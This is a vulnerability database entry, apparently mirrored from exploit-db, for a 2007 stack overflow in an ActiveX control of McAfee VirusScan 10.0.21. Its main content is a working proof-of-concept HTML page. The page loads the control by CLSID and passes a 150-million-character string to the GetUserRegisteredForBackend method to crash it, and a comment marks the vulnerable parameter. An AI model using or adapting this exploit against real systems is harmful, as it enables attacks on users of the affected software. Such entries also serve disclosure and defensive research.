McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow (PoC)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056240 漏洞类型
发布时间 2007-05-09 更新时间 2007-05-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/3890
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<html>

<head><title> Proof of Concept -> Mc Afee Viruscan Stack Overflow v10.0.21</title>

</head>

<h4>Proof of Concept -> Mc Afee Viruscan Stack Overflow v10.0.21

http://download.mcafee.com/fr/ author -> callAX

mail -> callax@shellcode.com.ar

Url -> http://www.shellcode.com.ar / http://www.securenetworks.ch</h3>

 

<object classid='clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602' id='Crash' ></object>

<input type="button" value="CrAsh-m3 No \/\/" language="VBScript" OnClick="CrAsHm3()">

 

<script language="VBScript">

sub CrAsHm3()

 Arg0 = String(150000000,"S")

 Arg1 = String(3000, "x")

 Crash.GetUserRegisteredForBackend Arg0, Arg1

End Sub

 

</script>

</html>

<!--
Bad method -> GetUserRegisteredForBackend

Function GetUserRegisteredForBackend (

            ByVal bstrBackend  As String , <-- Bad Buffer

            ByRef pvarAccountId  As Variant

)
-->

# milw0rm.com [2007-05-09]